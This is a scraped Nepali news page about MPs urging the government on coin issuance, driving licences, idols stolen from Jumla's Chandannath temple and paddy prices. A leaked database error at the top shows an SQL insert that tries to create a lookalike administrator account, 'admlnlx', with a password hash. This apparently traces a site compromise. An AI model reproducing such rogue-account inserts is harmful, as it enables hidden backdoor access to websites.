WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqGRbJxStuoPh8qzswRHKkZmBqUqGF.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:23:27', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
सिक्का निष्काशनदेखि लाइसेन्सको व्यवस्था गर्न माग – Gaule Khabar

सिक्का निष्काशनदेखि लाइसेन्सको व्यवस्था गर्न माग

सिक्का निष्काशनदेखि लाइसेन्सको व्यवस्था गर्न माग

काठमाडौँ, पुस २९ –

व्यवस्थापिका–संसद्को आजको बैठकको शून्य समयमा सांसदहरूले रु एक र दुईका सिक्का निष्काशनदेखि चाँडो सवारी चालक अनुमतिपत्र (लाइसेन्स) उपलब्ध गराउन सरकारसँग माग गरेका छन् ।

उनीहरुले जुम्लाको चन्दननाथ मन्दिरबाट चोरी भएकामध्ये फेला पार्न बाँकी मूर्तिको खोजीमा लाग्नुपर्नेमा जोड दिएका थिए । यसैगरी सर्वसाधारणले सहजरुपमा लाइसेन्स नपाएकाले सरकारले चाँडो उपलब्ध गराउने व्यवस्था गर्न र किसानलाई धानको उचित मोल उपलब्ध गराउन पनि सरकारको ध्यानाकर्षण गराएका थिए ।

त्यसरी सरकारको ध्यानाकर्षण गराउनेमा सांसद बलबहादुर महत, वंशीधर मिश्र, भक्तबहादुर खपाङ्गी, भरतकुमार साह र ममता गिरी हुनुहुन्थ्यो । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका